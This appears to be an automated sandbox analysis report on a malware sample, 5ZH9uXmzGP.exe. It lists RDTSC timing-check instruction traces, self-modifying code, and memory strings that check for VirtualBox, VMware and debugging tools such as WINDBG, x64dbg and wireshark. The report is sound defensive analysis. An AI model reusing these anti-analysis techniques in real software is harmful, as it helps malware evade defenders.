Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F014CA second address: 6F01537 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFA68B945C1h 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007FFAD75C27EBh 0x00000012 jmp 00007FFA68B945C7h 0x00000017 or dword ptr [edx+38h], FFFFFFFFh 0x0000001b jmp 00007FFA68B945C6h 0x00000020 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000024 jmp 00007FFA68B945C0h 0x00000029 or dword ptr [edx+40h], FFFFFFFFh 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F01537 second address: 6F0153B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F0153B second address: 6F01558 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F01558 second address: 6F01568 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA692CA41Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F01568 second address: 6F01591 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFA68B945C5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F01591 second address: 6F015AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 4E085942h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebx 0x0000000e pushad 0x0000000f mov cx, 21A7h 0x00000013 popad 0x00000014 leave 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov eax, edx 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F40C8D second address: 6F40C93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F40C93 second address: 6F40CA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c movzx eax, di 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF0776 second address: 6EF077A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF077A second address: 6EF0780 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF0780 second address: 6EF0812 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, ch 0x00000005 mov cl, dh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b jmp 00007FFA68B945C4h 0x00000010 push eax 0x00000011 pushad 0x00000012 call 00007FFA68B945C1h 0x00000017 jmp 00007FFA68B945C0h 0x0000001c pop eax 0x0000001d pushad 0x0000001e mov eax, ebx 0x00000020 popad 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FFA68B945C5h 0x0000002a add ch, 00000006h 0x0000002d jmp 00007FFA68B945C1h 0x00000032 popfd 0x00000033 mov edx, esi 0x00000035 popad 0x00000036 mov ebp, esp 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FFA68B945C4h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF0812 second address: 6EF0821 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA41Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6E90053 second address: 6E900BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FFA68B945BEh 0x0000000f push eax 0x00000010 jmp 00007FFA68B945BBh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 push eax 0x00000018 pushfd 0x00000019 jmp 00007FFA68B945BBh 0x0000001e sbb ax, A07Eh 0x00000023 jmp 00007FFA68B945C9h 0x00000028 popfd 0x00000029 pop esi 0x0000002a movsx edx, cx 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6E900BE second address: 6E900C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6E900C2 second address: 6E900C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6E900C8 second address: 6E900F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFA692CA41Ah 0x00000009 jmp 00007FFA692CA425h 0x0000000e popfd 0x0000000f movzx ecx, di 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pop ebp 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6E900F8 second address: 6E900FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6E906F5 second address: 6E906FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, C7B2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6E90AA5 second address: 6E90ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push esi 0x00000007 pushad 0x00000008 mov si, FF29h 0x0000000c push esi 0x0000000d push edi 0x0000000e pop esi 0x0000000f pop ebx 0x00000010 popad 0x00000011 mov dword ptr [esp], ebp 0x00000014 jmp 00007FFA68B945BCh 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6E90ACD second address: 6E90AD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6E90AD1 second address: 6E90AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EE09C0 second address: 6EE09C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EE09C5 second address: 6EE0A09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFA68B945C3h 0x00000009 sub eax, 11A1661Eh 0x0000000f jmp 00007FFA68B945C9h 0x00000014 popfd 0x00000015 mov bx, si 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EE0A09 second address: 6EE0A0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EE0A0F second address: 6EE0A20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA68B945BDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EE0A20 second address: 6EE0A24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EE0A24 second address: 6EE0A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFA68B945BFh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EE0A41 second address: 6EE0A5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA429h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC001F second address: 6EC0023 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC0023 second address: 6EC0029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC0029 second address: 6EC007C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFA68B945BAh 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007FFA68B945BBh 0x0000000f and ecx, 35E0EB7Eh 0x00000015 jmp 00007FFA68B945C9h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e xchg eax, ebp 0x0000001f jmp 00007FFA68B945BEh 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov ebx, esi 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC007C second address: 6EC00AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA424h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFA692CA427h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC00AE second address: 6EC00B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC00B4 second address: 6EC0173 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA41Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushad 0x0000000f mov ax, 1681h 0x00000013 mov ax, 99BDh 0x00000017 popad 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FFA692CA428h 0x0000001f adc ah, FFFFFFC8h 0x00000022 jmp 00007FFA692CA41Bh 0x00000027 popfd 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b popad 0x0000002c and esp, FFFFFFF0h 0x0000002f pushad 0x00000030 pushad 0x00000031 mov si, F237h 0x00000035 mov ax, 7AD3h 0x00000039 popad 0x0000003a pushad 0x0000003b mov dx, cx 0x0000003e pushfd 0x0000003f jmp 00007FFA692CA422h 0x00000044 add esi, 341ECA58h 0x0000004a jmp 00007FFA692CA41Bh 0x0000004f popfd 0x00000050 popad 0x00000051 popad 0x00000052 sub esp, 44h 0x00000055 jmp 00007FFA692CA426h 0x0000005a xchg eax, ebx 0x0000005b jmp 00007FFA692CA420h 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FFA692CA41Eh 0x00000068 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC0173 second address: 6EC01F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b push esi 0x0000000c pushfd 0x0000000d jmp 00007FFA68B945BBh 0x00000012 sub esi, 44636BDEh 0x00000018 jmp 00007FFA68B945C9h 0x0000001d popfd 0x0000001e pop eax 0x0000001f push edi 0x00000020 call 00007FFA68B945BCh 0x00000025 pop eax 0x00000026 pop edx 0x00000027 popad 0x00000028 xchg eax, esi 0x00000029 jmp 00007FFA68B945BEh 0x0000002e push eax 0x0000002f jmp 00007FFA68B945BBh 0x00000034 xchg eax, esi 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FFA68B945C5h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC01F5 second address: 6EC0263 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFA692CA427h 0x00000008 pushfd 0x00000009 jmp 00007FFA692CA428h 0x0000000e or esi, 262602F8h 0x00000014 jmp 00007FFA692CA41Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, edi 0x0000001e pushad 0x0000001f mov dl, cl 0x00000021 mov edx, 00ACB0D4h 0x00000026 popad 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FFA692CA429h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC0263 second address: 6EC0269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC0269 second address: 6EC026D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC026D second address: 6EC02DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c jmp 00007FFA68B945C6h 0x00000011 mov edi, dword ptr [ebp+08h] 0x00000014 pushad 0x00000015 mov si, 76ADh 0x00000019 movzx esi, di 0x0000001c popad 0x0000001d mov dword ptr [esp+24h], 00000000h 0x00000025 jmp 00007FFA68B945C5h 0x0000002a lock bts dword ptr [edi], 00000000h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FFA68B945BDh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC02DA second address: 6EC0312 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA421h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FFAD92CC55Ah 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007FFA692CA41Ah 0x00000018 adc ch, 00000008h 0x0000001b jmp 00007FFA692CA41Bh 0x00000020 popfd 0x00000021 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC0312 second address: 6EC0355 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov di, si 0x00000009 popad 0x0000000a pop edi 0x0000000b jmp 00007FFA68B945BEh 0x00000010 pop esi 0x00000011 jmp 00007FFA68B945C0h 0x00000016 pop ebx 0x00000017 jmp 00007FFA68B945C0h 0x0000001c mov esp, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC0355 second address: 6EC0359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC0359 second address: 6EC035D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC035D second address: 6EC0363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC0363 second address: 6EC0369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC0369 second address: 6EC036D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC036D second address: 6EC0371 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC0371 second address: 6EC0395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FFA692CA429h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC0395 second address: 6EC039A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF08B0 second address: 6EF08B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF08B4 second address: 6EF08D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF08D1 second address: 6EF0949 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFA692CA427h 0x00000009 adc si, EACEh 0x0000000e jmp 00007FFA692CA429h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FFA692CA420h 0x0000001a add eax, 6DAF9348h 0x00000020 jmp 00007FFA692CA41Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 xchg eax, ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FFA692CA425h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF0949 second address: 6EF0959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA68B945BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF0959 second address: 6EF097E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFA692CA428h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF097E second address: 6EF0984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF0984 second address: 6EF0995 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA692CA41Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF0995 second address: 6EF0999 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF0999 second address: 6EF09BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FFA692CA428h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF09BC second address: 6EF09E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFA68B945C2h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF09E2 second address: 6EF09E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF09E6 second address: 6EF0A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 mov ecx, edi 0x00000009 popad 0x0000000a popad 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFA68B945C2h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF0A06 second address: 6EF0A18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA692CA41Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF0B6A second address: 6EF0B7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF0B7F second address: 6EF0B85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF0B85 second address: 6EF0BE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FFA68B945BFh 0x0000000e mov ebp, esp 0x00000010 jmp 00007FFA68B945C6h 0x00000015 push dword ptr [ebp+04h] 0x00000018 jmp 00007FFA68B945C0h 0x0000001d push dword ptr [ebp+0Ch] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FFA68B945C7h 0x00000027 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSpecial instruction interceptor: First address: A38528 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSpecial instruction interceptor: First address: A36C26 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSpecial instruction interceptor: First address: 88BCEF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSpecial instruction interceptor: First address: ABFD31 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeCode function: 1_2_06ED0CA7 rdtsc 1_2_06ED0CA7
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeCode function: 1_2_06F304CE sldt word ptr [eax]1_2_06F304CE
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeAPI coverage: 4.1 %
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: 5ZH9uXmzGP.exe, 5ZH9uXmzGP.exe, 00000001.00000002.2414578137.0000000000A17000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.5.drBinary or memory string: VMware
Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.drBinary or memory string: vmci.sys
